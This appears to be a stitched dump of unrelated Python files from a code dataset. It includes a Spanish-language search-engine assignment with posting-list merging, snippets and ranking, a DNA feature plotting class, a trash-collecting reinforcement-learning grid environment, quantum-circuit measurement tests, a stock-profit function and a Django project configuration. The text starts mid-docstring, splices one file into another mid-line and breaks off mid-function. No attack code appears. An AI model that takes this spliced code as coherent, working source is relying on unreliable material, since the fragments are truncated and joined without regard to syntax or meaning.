TODAS LAS VERSIONES\n\n Calcula el AND de dos posting list de forma EFICIENTE\n\n param: \"p1\", \"p2\": posting lists sobre las que calcular\n\n\n return: posting list con los newid incluidos en p1 y p2\n\n \"\"\"\n \n posting = []\n i = 0 \n j = 0\n if p1 is None and p2 is None: res = []\n while ((i < len(p1)) & (j < len(p2))):\n if p1[i] == p2[j]:\n posting.append(p2[j])\n i += 1 \n j += 1\n elif p1[i] < p2[j]:\n i += 1\n else: j += 1\n\n return posting\n\n\n def or_posting(self, p1, p2):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Calcula el OR de dos posting list de forma EFICIENTE\n\n param: \"p1\", \"p2\": posting lists sobre las que calcular\n\n\n return: posting list con los newid incluidos de p1 o p2\n\n \"\"\"\n \n posting = []\n i = 0 \n j = 0\n\n\n\n while ((i < len(p1)) & (j < len(p2))):\n if p1[i] == p2[j]:\n posting.append(p1[i])\n i = i+1\n j = j+1\n elif p1[i] < p2[j]:\n posting.append(p1[i])\n i = i+1\n else:\n posting.append(p2[j])\n j = j+1\n\n while (i < len(p1)):\n posting.append(p1[i])\n i += 1\n while (j < len(p2)):\n posting.append(p2[j])\n j += 1\n\n return posting\n\n\n\n #####################################\n ### ###\n ### PARTE 2.2: MOSTRAR RESULTADOS ###\n ### ###\n #####################################\n\n\n def solve_and_count(self, query):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Resuelve una consulta y la muestra junto al numero de resultados \n\n param: \"query\": query que se debe resolver.\n\n return: el numero de noticias recuperadas, para la opcion -T\n\n \"\"\"\n result = self.solve_query(query)\n print(\"%s\\t%d\" % (query, len(result)))\n return len(result) # para verificar los resultados (op: -T)\n\n\n def solve_and_show(self, query):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Resuelve una consulta y la muestra informacion de las noticias recuperadas.\n Consideraciones:\n\n - En funcion del valor de \"self.show_snippet\" se mostrara una informacion u otra.\n - Si se implementa la opcion de ranking y en funcion del valor de self.use_ranking debera llamar a self.rank_result\n\n param: \"query\": query que se debe resolver.\n\n return: el numero de noticias recuperadas, para la opcion -T\n \n \"\"\"\n result = self.solve_query(query)\n\n \n if self.show_snippet is True or self.use_ranking is True: #Generamos snippets en orden de result\n terms = []\n lista_query = re.split(\" +(AND|OR) +\",query)\n for term in lista_query:\n if term not in ['AND','OR']:\n if term.find('NOT ') != 0: #Si no hay un not en el término\n terms.append(term)\n \n if self.show_snippet is True and len(result)>0:\n snippets = self.create_snippet(result,terms)\n if self.use_ranking is True and len(result)>0:\n result = self.rank_result(result,terms)\n \n \n print(\"========================\")\n print(\"Query: '%s'\" % query)\n print(\"Number of results: %d\" % len(result))\n i=1\n\n\n \n\n for id in result:\n \n\n (doc,position) = self.news[id][0]\n filename = self.docs[doc]\n with open(filename) as fh:\n jlist = json.load(fh)\n jlist = jlist[position]\n fecha = jlist['date']\n title = jlist['title']\n keywords = jlist['keywords']\n\n\n if self.use_ranking is True and len(result)>0:\n print(\"#%d \\t (%d)\\t (%d)\\t (%s) %s \\t (%s) \" % (i, doc, self.weight[id], fecha, title, keywords))\n else:\n print(\"#%d \\t (%d)\\t (0)\\t (%s) %s \\t (%s) \" % (i, doc, fecha, title, keywords))\n\n if self.show_snippet is True:\n for snippet in snippets[id]:\n print(\"\\t\\t %s\" % snippet)\n\n i+=1\n if i > self.SHOW_MAX and self.show_all == False:\n break\n\n \n\n print(\"========================\")\n return len(result)\n\n\n\n ########################################\n ## COMPLETAR PARA TODAS LAS VERSIONES ##\n ########################################\n def func_sort(self,noticia):\n \"\"\"\n Devuelve las puntuaciones\n\n param: \"noticia\": número de noticia\n\n \"\"\"\n \n \n return self.weight[noticia]\n\n\n\n\n def create_snippet(self, posts, terms):\n \"\"\"\n Crea un snippet de los términos que aparecen en la query y en el documento\n\n param: \"posts\": posting list de los documentos que coinciden con la query\n \"terms\": términos que aparecen en la query\n\n \"\"\"\n lista_snippets = {}\n positional = False\n\n for noticia in posts:\n (doc_id, posicion) = self.news[noticia][0]\n f = self.docs[doc_id]\n lista_snippets.setdefault(noticia,[])\n with open(f) as fh:\n jlist = json.load(fh)\n news = jlist[posicion]\n\n for term in terms:\n field = 'article' #Valor por defecto\n if term.find('\"')==0:\n #Es posicional\n positional = True\n term = term[1:len(term)-1]\n else:\n #No es posici\n positional = False\n aux = term.split(\":\")\n if len(aux) > 1:\n #Tiene keywords\n term = aux[1]\n field = aux[0]\n\n\n if self.use_stemming is True and positional is False:\n stem = self.stemmer.stem(term)\n if len(stem) == len(term):\n pattern = re.compile(r'\\b({0})\\b'.format(term), flags=re.IGNORECASE) #La longitud del stem es la misma, puede que solo quite acentos\n else:\n pattern = re.compile(r'\\b({0})'.format(stem), flags=re.IGNORECASE) #Puede no haber espacio al final al ser stem\n else:\n pattern = re.compile(r'\\b({0})\\b'.format(term), flags=re.IGNORECASE)\n\n #Separamos la palabra del resto del texto\n if self.use_stemming: \n words = re.split(pattern, self.normalize(news[field]))\n else:\n words = re.split(pattern, news[field])\n\n if len(words) > 1:\n precedente = ' '.join(words[0].split()[-3:])\n consecuente = ' '.join(words[2].split()[:3])\n\n if self.use_stemming is True and positional is False:\n result = \"...\" + precedente + \" \" + stem + \"\" + consecuente + \"...\"\n else:\n result = \"...\" + precedente + \" \" + term + \" \" + consecuente + \"...\"\n \n lista_snippets[noticia].append(result)\n \n \n return lista_snippets\n \n\n def normalize(self, s):\n \"\"\"\n Elimina las tildes de un texto\n\n :param\n s: texto a normalizar\n \n :return: texto s sin tildes\n \"\"\"\n replacements = (\n (\"á\", \"a\"),\n (\"é\", \"e\"),\n (\"í\", \"i\"),\n (\"ó\", \"o\"),\n (\"ú\", \"u\"),\n )\n for a, b in replacements:\n s = s.replace(a, b).replace(a.upper(), b.upper())\n return s\n\n def rank_result(self, result, query):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE RANKING\n\n Ordena los resultados de una query.\n\n param: \"result\": lista de resultados sin ordenar\n \"query\": query, puede ser la query original, la query procesada o una lista de terminos\n\n\n return: la lista de resultados ordenada\n\n \"\"\"\n self.weight #Aquí almacenaremos la Score de cada documento\n fields = []\n terms = []\n\n for term in query:\n aux = term.split(':')\n field = 'article'\n if len(aux) > 1:\n #Tiene keyword\n field = aux[0]\n term = aux[1]\n if term.find('\"')==0: \n #Es posicional\n term = term[1:len(term)-1]\n for subterm in term.split(' '):\n terms.append(subterm)\n fields.append(field)\n else:\n #No es posicional\n terms.append(term)\n fields.append(field)\n else:\n #No tiene keyword\n if term.find('\"')==0: \n #Es posicional\n term = term[1:len(term)-1] #Quitamos las comillas\n for subterm in term.split(' '):\n terms.append(subterm)\n fields.append(field)\n else:\n #No es posicional\n terms.append(term)\n fields.append(field) \n\n\n rareza_termino = []\n i=0\n if self.multifield is True:\n if self.use_stemming is True: \n #Multifield y Stemming\n while i < len(terms):\n stem = self.stemmer.stem(terms[i])\n if stem in self.sindex:\n term_stem = self.sindex[stem]\n rareza_termino.append(0)\n for t in term_stem:\n if t in list(self.index[fields[i]]):\n rareza_termino[i] += len(self.index[fields[i]][t])\n if rareza_termino[i] == 0:\n rareza_termino[i] = 100000 #Ponemos un valor alto ya que queremos usar la inversa\n i+=1\n else: \n #Multifield y No Stemming\n while i < len(terms):\n if terms[i] in self.index[fields[i]]:\n rareza_termino.append(len(self.index[fields[i]][terms[i]]))\n else:\n rareza_termino.append(100000) #Ponemos un valor alto ya que queremos usar la inversa\n \n i+=1\n else:\n if self.use_stemming is True: \n #No Multifield y Stemming\n while i < len(terms):\n stem = self.stemmer.stem(terms[i])\n if stem in self.sindex:\n term_stem = self.sindex[stem]\n rareza_termino.append(0)\n for t in term_stem:\n if t in list(self.index.keys()):\n rareza_termino[i] += len(self.index[t])\n if rareza_termino[i] == 0:\n rareza_termino[i] = 100000 #Ponemos un valor alto ya que queremos usar la inversa\n\n i+=1\n \n else: \n #No Multifield y no Stemming\n while i loc2[0]\n\n @property\n def length(self):\n \"\"\"Return the length of the feature (end-start)\"\"\"\n return abs(self.end - self.start)\n\n @property\n def x_center(self):\n \"\"\"Return the x-center of the feature, (start+end)/2\"\"\"\n return 0.5 * (self.start + self.end)\n\n @staticmethod\n def from_biopython_feature(feature, **props):\n \"\"\"Create a GraphicalFeature from a Biopython.Feature object.\"\"\"\n return GraphicFeature(start=feature.location.start,\n end=feature.location.end,\n strand=feature.location.strand,\n **props)\n\n def __repr__(self):\n return ((\"GF(%(label)s, %(start)d-%(end)d \" % self.__dict__) +\n (\")\" if self.strand is None else \"(%d))\" % self.strand))\n","repo_name":"cdnstp/SCCmec_CLA","sub_path":"sccmec_cla/lib/python3.7/site-packages/dna_features_viewer/GraphicFeature.py","file_name":"GraphicFeature.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"10564890204","text":"import numpy as np\nimport random\nfrom agent import Agent, Action\nfrom matplotlib.pyplot import *\n\n\n### ENVIRONMENT ###\n\nclass Environment:\n '''The class that represents our pretty environment'''\n\n # some defaults parameters\n default_parameters = {\n 'width': 10,\n 'height': 10,\n 'obstacles': [(2, 2), (3, 2), (4, 2), (7, 1), (8, 1), (8,2),\n (8, 3), (8, 4), (4, 3), (4, 4), (4, 5), (5, 5),\n (5, 6), (5, 7), (1, 7), (1, 8), (2, 8), (3, 8), (6, 7), (7, 7)],\n 'nb_trashes': 22\n }\n\n def __init__(self, w=0, h=0, nb_trashes=0):\n '''\n Initialize the environment\n\n :param agent: the agent to add in the environment\n :param w: width of the environment (not including walls)\n :param h: height of the environment (not including walls)\n :param nb_trashes: number of trashes in the environment\n '''\n\n self.width = self.default_parameters['width'] if w == 0 else w # setting width\n self.height = self.default_parameters['height'] if h == 0 else h # setting height\n\n self.obstacles = self.default_parameters['obstacles'] # set the obstacles\n\n # stuffs related to the Agent (action space, state space, the agent itself)\n self.action_space_n = Action.size() # cardinality of action space\n self.state_space_n = 2 * (self.width + 2) * (self.height + 2) # cardinality of action space : Position of agent\n self.state_features = 3 # position and presence of reward\n self.position = (0, 0)\n\n # start throwing trashes around to get the agent a job\n self.nb_trashes = self.default_parameters['nb_trashes'] if nb_trashes == 0 else nb_trashes\n self.clean_trash = 0\n self.trashes = [] # all positions of trashes\n i = 0\n random.seed(self.nb_trashes) # to ensure that every time the random will return the same sequence\n while i < self.nb_trashes:\n x = random.randint(1, self.width+1)\n y = random.randint(1, self.height+1)\n\n # if newly generated position is not that of another trash / an obstacle / the initial position of the agent\n if (x, y) not in self.trashes and (x, y) not in self.obstacles and (x, y) != self.position:\n self.trashes.append((x, y))\n i += 1\n\n # for conversion between position and tile #\n # this will help when using Q_table #\n self.fig = figure(figsize=(7, 7))\n self.ax = self.fig.add_subplot(1, 1, 1)\n self.xticks = np.arange(-0.5, self.width + 1.5, 1)\n self.yticks = np.arange(-0.5, self.height + 1.5, 1)\n self.ax.grid()\n self.ax.set_xticks(self.xticks)\n self.ax.set_yticks(self.yticks)\n self.ax.plot(np.array(self.trashes)[:, 0], np.array(self.trashes)[:, 1], \"co\", markersize=30, alpha=0.2)\n self.ax.plot(np.array(self.obstacles)[:, 0], np.array(self.obstacles)[:, 1], \"ks\", markersize=30, alpha=0.4)\n # drawing the walls\n self.ax.plot(range(self.width + 2), 0 * np.ones(self.width + 2), 'r')\n self.ax.plot(range(self.width + 2), (self.height + 1) * np.ones(self.width + 2), 'r')\n self.ax.plot(0 * np.ones(self.height + 2), range(self.height + 2), 'r')\n self.ax.plot((self.width + 1) * np.ones(self.height + 2), range(self.height + 2), 'r')\n\n def display(self):\n '''\n Display the environment\n '''\n\n ion()\n self.ax.plot(self.position[0], self.position[1], \"rX\", markersize=30)\n show()\n pause(0.3)\n self.ax.plot(self.position[0], self.position[1], \"ws\", markersize=30)\n\n def go_into_obstacle(self, new_pos):\n '''\n Verify whether the agent hits an obstacle\n\n :param new_pos: next state after execution an action\n :return: True if new position is an obstacle\n '''\n\n return new_pos in self.obstacles\n\n def step(self, a):\n '''\n Execute action a\n\n :param a: an action in the action space {LEFT, RIGHT, UP, DOWN}\n :return: new state, reward, termination flag, info\n '''\n\n # prepare to calculate the new state\n go_into_wall = False\n go_into_obstacle = False\n\n # TO DISCUSS\n # so, what is the limit of walls? -1 and width + 1 | height + 1 ?\n # TO DISCUSS\n '''\n Rescale the map in order to add wall position \n Wall position:\n [0, 0] , [0, 1] ,..., [0, HEIGHT + 2] (Left wall)\n [WIDTH + 2, 0] , [WIDTH + 2, 1] ,..., [WIDTH + 2, HEIGHT + 2] (Right wall)\n [0, 0] , [1, 0], ,..., [WIDTH + 2, 0] (Bottom wall)\n [0, HEIGHT + 2] , [1, HEIGHT + 2],..., [WIDTH + 2, HEIGHT + 2] (Upper wall)\n After this, add terminal condition when robot goes into the wall\n '''\n\n # LEFT\n if a == Action.LEFT:\n new_pos = (self.position[0] - 1, self.position[1])\n if new_pos[0] == 0:\n go_into_wall = True\n else:\n go_into_obstacle = self.go_into_obstacle(new_pos)\n # RIGHT\n elif a == Action.RIGHT:\n new_pos = (self.position[0] + 1, self.position[1])\n if new_pos[0] == self.width + 1:\n go_into_wall = True\n else:\n go_into_obstacle = self.go_into_obstacle(new_pos)\n # DOWN\n elif a == Action.DOWN:\n new_pos = (self.position[0], self.position[1] - 1)\n if new_pos[1] == 0:\n go_into_wall = True\n else:\n go_into_obstacle = self.go_into_obstacle(new_pos)\n # UP\n else:\n new_pos = (self.position[0], self.position[1] + 1)\n if new_pos[1] == self.height + 1:\n go_into_wall = True\n else:\n go_into_obstacle = self.go_into_obstacle(new_pos)\n '''\n if go_into_wall:\n new_pos = self.agent.position # to prevent the case where pos2tile return -1\n else:\n self.agent.position = new_pos\n '''\n self.position = new_pos\n #new_pos = self.pos2tile(new_pos)\n state = np.append(np.array(new_pos), 0)\n\n # default values\n reward = -0.01\n done = False\n info = \"(\" + str(self.position) + \", 0)\"\n\n # if the agent hits a wall or an obstacle, diminish the reward\n if go_into_wall or go_into_obstacle:\n done = True\n reward = -1\n\n # if the agent manages to clean the trashes which is its job\n if self.position in self.trashes:\n self.trashes.remove(self.position)\n self.clean_trash += 1\n info = \"(\" + str(self.position) + \", 1)\"\n reward = 1\n #new_pos += (self.height + 2) * (self.width + 2) # the state (x, y, bool) where bool represent the presence of trash\n state[2] = 1\n\n\n # hits walls and screams for help\n if go_into_wall:\n info = \"Go into walls!\"\n\n # hits obstacle and also screams for help\n if go_into_obstacle:\n info = \"Go into obstacle!\"\n\n return [state, reward, done, info]\n\n def reset(self):\n '''\n Reinitialize the starting position, and put back the trashes that have been cleaned (right at the same position as previously initialized)\n\n Returns\n -------\n new_pos: new initial position\n '''\n\n self.trashes.clear()\n self.clean_trash = 0\n i = 0\n random.seed(self.nb_trashes) # return the same sequence of random numbers\n while i < self.nb_trashes:\n x = random.randint(1, self.width)\n y = random.randint(1, self.height)\n if (x, y) not in self.trashes and (x, y) not in self.obstacles:\n self.trashes.append((x, y))\n i += 1\n\n # random position starting point for robot\n # new position must be different from obstacles!\n new_pos = (np.random.randint(1, self.width+1), np.random.randint(1, self.height+1))\n while new_pos in self.obstacles:\n new_pos = (np.random.randint(1, self.width+1), np.random.randint(1, self.height+1))\n self.position = new_pos\n state = np.append(np.array(new_pos), 0)\n\n # drawing stuffs\n cla()\n self.ax.grid()\n self.ax.set_xticks(self.xticks)\n self.ax.set_yticks(self.yticks)\n self.ax.plot(np.array(self.trashes)[:, 0], np.array(self.trashes)[:, 1], \"co\", markersize=25, alpha=0.2)\n self.ax.plot(np.array(self.obstacles)[:, 0], np.array(self.obstacles)[:, 1], \"ks\", markersize=25, alpha=0.4)\n # drawing the walls\n self.ax.plot(range(self.width+2), np.zeros(self.width+2), 'r')\n self.ax.plot(range(self.width+2), (self.height + 1) * np.ones(self.width+2), 'r')\n self.ax.plot(np.zeros(self.height+2), range(self.height+2), 'r')\n self.ax.plot((self.width + 1) * np.ones(self.height+2), range(self.height+2), 'r')\n\n # return the new initial position\n #new_pos = self.pos2tile(new_pos)\n if self.position in self.trashes:\n #new_pos = new_pos + (self.width + 2) * (self.height + 2)\n state[2] = 1\n return state\n\n def action_sample(self):\n '''\n Generate random action\n\n :return: action to execute\n '''\n return np.random.randint(0, self.action_space_n)\n\n # Not being used at the moment\n def rollout(self, n_iter, pi):\n '''\n Generate the data (state, action, reward) for n_iter iterations in advanced by following policy pi\n\n :param n_iter: number of iterations to anticipate\n :param pi: the policy to follow (matrix of probability of actions to take at each state)\n :return: a set of states, actions, and reward\n '''\n states = []\n actions = []\n rewards = []\n\n s = self.position\n trashes = self.trashes.copy()\n sprime = self.position\n states.append(self.pos2tile(s))\n for i in range(n_iter):\n a = np.argmax(pi[sprime]) # get the action that maximizes the policy map\n actions.append(a)\n sprime, reward, done, info = self.step(a)\n states.append(sprime)\n rewards.append(reward)\n\n if done:\n break\n\n # put back the intial state\n self.position = s\n self.trashes = trashes\n\n return [states, actions, rewards]","repo_name":"MinhHuong/INF581_project","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":10612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22451136805","text":"\"\"\"Test :class:`qibo.abstractions.gates.M` as standalone and as part of circuit.\"\"\"\nimport pytest\nimport numpy as np\nfrom qibo import models, gates, K\nfrom qibo.tests.utils import random_state, random_density_matrix\n\n\n@pytest.mark.parametrize(\"nqubits,targets\",\n [(2, [1]), (3, [1]), (4, [1, 3]), (5, [0, 3, 4]),\n (6, [1, 3]), (4, [0, 2])])\ndef test_measurement_collapse(backend, nqubits, targets):\n initial_state = random_state(nqubits)\n gate = gates.M(*targets, collapse=True)\n final_state = gate(K.cast(np.copy(initial_state)), nshots=1)\n results = gate.result.binary[0]\n slicer = nqubits * [slice(None)]\n for t, r in zip(targets, results):\n slicer[t] = int(r)\n slicer = tuple(slicer)\n initial_state = initial_state.reshape(nqubits * (2,))\n target_state = np.zeros_like(initial_state)\n target_state[slicer] = initial_state[slicer]\n norm = (np.abs(target_state) ** 2).sum()\n target_state = target_state.ravel() / np.sqrt(norm)\n K.assert_allclose(final_state, target_state)\n\n\n@pytest.mark.parametrize(\"nqubits,targets\",\n [(2, [1]), (3, [1]), (4, [1, 3]), (5, [0, 3, 4])])\ndef test_measurement_collapse_density_matrix(backend, nqubits, targets):\n initial_rho = random_density_matrix(nqubits)\n gate = gates.M(*targets, collapse=True)\n gate.density_matrix = True\n final_rho = gate(K.cast(np.copy(initial_rho)), nshots=1)\n results = gate.result.binary[0]\n target_rho = np.reshape(initial_rho, 2 * nqubits * (2,))\n for q, r in zip(targets, results):\n r = int(r)\n slicer = 2 * nqubits * [slice(None)]\n slicer[q], slicer[q + nqubits] = 1 - r, 1 - r\n target_rho[tuple(slicer)] = 0\n slicer[q], slicer[q + nqubits] = r, 1 - r\n target_rho[tuple(slicer)] = 0\n slicer[q], slicer[q + nqubits] = 1 - r, r\n target_rho[tuple(slicer)] = 0\n target_rho = np.reshape(target_rho, initial_rho.shape)\n target_rho = target_rho / np.trace(target_rho)\n K.assert_allclose(final_rho, target_rho)\n\n\ndef test_measurement_collapse_errors(backend):\n gate = gates.M(0, 1, collapse=True)\n state = np.ones(4) / 4\n with pytest.raises(ValueError):\n state = gate(K.cast(state), nshots=100)\n\n\ndef test_measurement_collapse_bitflip_noise(backend, accelerators):\n K.set_seed(123)\n c = models.Circuit(4, accelerators)\n with pytest.raises(NotImplementedError):\n output = c.add(gates.M(0, 1, p0=0.2, collapse=True))\n\n\n@pytest.mark.parametrize(\"effect\", [False, True])\ndef test_measurement_result_parameters(backend, accelerators, effect):\n c = models.Circuit(4, accelerators)\n if effect:\n c.add(gates.X(0))\n output = c.add(gates.M(0, collapse=True))\n c.add(gates.RX(1, theta=np.pi * output / 4))\n\n target_c = models.Circuit(4)\n if effect:\n target_c.add(gates.X(0))\n target_c.add(gates.RX(1, theta=np.pi / 4))\n K.assert_allclose(c(), target_c())\n\n\ndef set_device_seed(seed, accelerators):\n if accelerators:\n with K.on_cpu():\n K.set_seed(seed)\n else:\n K.set_seed(seed)\n\n\ndef test_measurement_result_parameters_random(backend, accelerators):\n test_device = K.cpu_devices[0] if accelerators else K.default_device\n initial_state = random_state(4)\n set_device_seed(123, accelerators)\n c = models.Circuit(4, accelerators)\n output = c.add(gates.M(1, collapse=True))\n c.add(gates.RY(0, theta=np.pi * output / 5))\n c.add(gates.RX(2, theta=np.pi * output / 4))\n result = c(initial_state=np.copy(initial_state))\n assert len(output.frequencies()) == 1\n\n set_device_seed(123, accelerators)\n with K.device(test_device):\n collapse = gates.M(1, collapse=True)\n target_state = collapse(K.cast(np.copy(initial_state)))\n if int(collapse.result.outcome()):\n target_state = gates.RY(0, theta=np.pi / 5)(target_state)\n target_state = gates.RX(2, theta=np.pi / 4)(target_state)\n K.assert_allclose(result, target_state)\n\n\n@pytest.mark.parametrize(\"use_loop\", [True, False])\ndef test_measurement_result_parameters_repeated_execution(backend, accelerators, use_loop):\n test_device = K.cpu_devices[0] if accelerators else K.default_device\n initial_state = random_state(4)\n set_device_seed(123, accelerators)\n c = models.Circuit(4, accelerators)\n output = c.add(gates.M(1, collapse=True))\n c.add(gates.RX(2, theta=np.pi * output / 4))\n if use_loop:\n final_states = []\n for _ in range(20):\n final_states.append(c(np.copy(initial_state)).state())\n else:\n final_states = c(initial_state=np.copy(initial_state), nshots=20)\n\n set_device_seed(123, accelerators)\n target_states = []\n with K.device(test_device):\n for _ in range(20):\n collapse = gates.M(1, collapse=True)\n target_state = collapse(K.cast(np.copy(initial_state)))\n if int(collapse.result.outcome()):\n target_state = gates.RX(2, theta=np.pi / 4)(target_state)\n target_states.append(np.copy(target_state))\n final_states = K.stack(final_states)\n target_states = K.stack(target_states)\n K.assert_allclose(final_states, target_states)\n\n\ndef test_measurement_result_parameters_repeated_execution_final_measurements(backend):\n initial_state = random_state(4)\n K.set_seed(123)\n c = models.Circuit(4)\n output = c.add(gates.M(1, collapse=True))\n c.add(gates.RY(0, theta=np.pi * output / 3))\n c.add(gates.RY(2, theta=np.pi * output / 4))\n c.add(gates.M(0, 1, 2, 3))\n result = c(initial_state=np.copy(initial_state), nshots=30)\n final_samples = result.samples(binary=False)\n\n K.set_seed(123)\n target_samples = []\n for _ in range(30):\n collapse = gates.M(1, collapse=True)\n target_state = collapse(K.cast(np.copy(initial_state)))\n if int(collapse.result.outcome()):\n target_state = gates.RY(0, theta=np.pi / 3)(target_state)\n target_state = gates.RY(2, theta=np.pi / 4)(target_state)\n with K.device(K.default_device):\n target_result = gates.M(0, 1, 2, 3)(target_state)\n target_samples.append(target_result.decimal[0])\n target_samples = K.stack(target_samples)\n K.assert_allclose(final_samples, target_samples)\n\n\ndef test_measurement_result_parameters_multiple_qubits(backend):\n initial_state = random_state(4)\n K.set_seed(123)\n c = models.Circuit(4)\n output = c.add(gates.M(0, 1, 2, collapse=True))\n c.add(gates.RY(1, theta=np.pi * output[0] / 5))\n c.add(gates.RX(3, theta=np.pi * output[2] / 3))\n result = c(initial_state=np.copy(initial_state))\n\n K.set_seed(123)\n collapse = gates.M(0, 1, 2, collapse=True)\n target_state = collapse(K.cast(np.copy(initial_state)))\n # not including in coverage because outcomes are probabilistic and may\n # not occur for the CI run\n if int(collapse.result.outcome(0)): # pragma: no cover\n target_state = gates.RY(1, theta=np.pi / 5)(target_state)\n if int(collapse.result.outcome(2)): # pragma: no cover\n target_state = gates.RX(3, theta=np.pi / 3)(target_state)\n K.assert_allclose(result, target_state)\n","repo_name":"shangtai/qibo-error-mitigation","sub_path":"src/qibo/tests/test_measurement_gate_collapse.py","file_name":"test_measurement_gate_collapse.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"17608007011","text":"def buysell_stock(arr):\n n=len(arr)\n maxpro=0\n buy_index = sell_index = 0\n for i in range(n):\n for j in range(i+1,n):\n \n # if arr[j]>arr[i]:\n # maxpro=max(maxpro,arr[j]-arr[i])\n if arr[j] - arr[i] > maxpro:\n maxpro=max(maxpro,arr[j]-arr[i])\n buy_index=i\n sell_index=j\n\n\n return maxpro,buy_index,sell_index\narr=[7,1,5,3,6,4]\nprint(buysell_stock(arr))\n# arr=[7,1,5,3,6,4]\n","repo_name":"mrHimanshu4u/75Days_Challenge","sub_path":"Day10/buysell_stock.py","file_name":"buysell_stock.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18414232194","text":"import os\nimport sys\nimport subprocess\n\nsplit_cwd = os.path.split(os.getcwd())\n# We should be running this from the resting directory within the repository, although this is a problem for documentation generation\n#assert split_cwd[1] == 'resting'\nrepository_top_directory = split_cwd[0]\n\napp_name = 'test'\n\n## Run on NERSC Spin\n\n#server_name = ''\n#platform = 'spin'\nNERSC_project_id = ''\n\n## Run on a standalone server\n\nserver_name = 'localhost'\nplatform = sys.platform\n\nengine = 'docker'\n#engine = 'podman'\n\n# These are the file locations in the host filesystem, as needed on a standalone server\n# Under Cygwin on a Windows computer, these must be translated to be recognized by Docker, which is installed separately\n# http://stackoverflow.com/questions/8220108/ddg#8220141\nif sys.platform == 'cygwin':\n completed_process = subprocess.run(['cygpath','-w',repository_top_directory + '/secrets'],capture_output=True)\n secrets_directory = completed_process.stdout.decode()[:-1]\n completed_process = subprocess.run(['cygpath','-w',repository_top_directory + '/pgdata'],capture_output=True) \n pgdata_directory = completed_process.stdout.decode()[:-1]\nelse:\n secrets_directory = repository_top_directory + '/secrets'\n pgdata_directory = repository_top_directory + '/pgdata'\n\n# The webserver/ssl directory within the repository and its contents are automatically copied recursively onto /etc/ssl within the webserver Docker image, these are required on a standalone server\n# Specify the file locations within the Docker image\nssl_certificate_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\nssl_certificate_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'\n\n## Homepage\n\n# This is the Django template for the site homepage, assumed to be in the webserver/website/templates directory within the repository. If blank, the API root will be the site homepage.\n#index_template = ''\nindex_template = 'index.html'\n\n## API\n\n# Blank or null will use the default URL scheme, with the API root as the default landing page\n# This is ignored if a homepage template is not given above\napi_prefix = 'api'\n\n# Description format:\n# { \n# ModelName_str : {\n# ModelAttribute_str : {\n# \"type\" : Instanciation_str,\n# \"filters\" : [ FilterName_str, ... ]\n# }, ...\n# }, ...\n# }\n\nmodels = {\n 'Independent':{\n # # This is the default field added by Django\n # 'id' : {\n # 'type': 'models.AutoField(primary_key=True)',\n # 'filters' : ['exact','in']\n # },\n 'charfield' : {\n 'type' : 'models.CharField(max_length=32,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n 'intfield' : {\n 'type' : 'models.IntegerField(null=True,blank=True)',\n 'filters' : ['isnull','exact','gte','lte'],\n },\n 'floatfield' : {\n 'type' : 'models.FloatField(null=True,blank=True)',\n 'filters' : ['exact','isnull','gte','lte'],\n },\n 'urlfield' : {\n 'type' : 'models.URLField(max_length=256,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n 'textfield' : {\n 'type' : 'models.TextField(max_length=8192,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n # Storage locations can be customized through the \"upload_to\" keyword parameter\n # For example: upload_to='independent/%Y/%m/%d'\n # file:///usr/share/doc/python-django/html/ref/models/fields.html#django.db.models.FileField.upload_to\n 'filefield' : {\n 'type' : 'models.FileField(max_length=256,blank=True)',\n 'filters' : [],\n },\n },\n 'Dependent':{\n # # This is usually automatically added by Django\n # 'id' : {\n # 'type': 'models.AutoField(primary_key=True)',\n # 'filters' : ['exact','in']\n # },\n 'charfield' : {\n 'type' : 'models.CharField(max_length=32,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n 'intfield' : {\n 'type' : 'models.IntegerField(null=True,blank=True)',\n 'filters' : ['isnull','exact','gte','lte'],\n },\n 'floatfield' : {\n 'type' : 'models.FloatField(null=True,blank=True)',\n 'filters' : ['exact','isnull','gte','lte'],\n },\n 'urlfield' : {\n 'type' : 'models.URLField(max_length=256,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n 'textfield' : {\n 'type' : 'models.TextField(max_length=8192,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n # Storage locations can be customized through the upload_to keyword parameter\n # file:///usr/share/doc/python-django/html/ref/models/fields.html#django.db.models.FileField.upload_to\n 'filefield' : {\n 'type' : 'models.FileField(max_length=256,blank=True)',\n 'filters' : [],\n },\n 'onetoonefield' : {\n 'type' : 'models.OneToOneField(Independent,related_name=\"onetoonefield\",on_delete=models.CASCADE)',\n 'filters' : [],\n },\n 'foreignkeyfield' : {\n 'type' : 'models.ForeignKey(Independent,related_name=\"onetomanyfield\",on_delete=models.CASCADE)',\n 'filters' : [],\n },\n 'manytomanyfield' : {\n 'type' : 'models.ManyToManyField(Independent,related_name=\"manytomanyfield\")',\n 'filters' : [],\n },\n },\n }\n","repo_name":"dani-lbnl/resting","sub_path":"resting/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"4539564497","text":"import sympy as sym\nfrom tabulate import tabulate\nx = sym.Symbol(\"x\")\nf_x = 1.2 * x**5 - 2.57*x + 2\n\n\ndef f(f_x, val):\n return 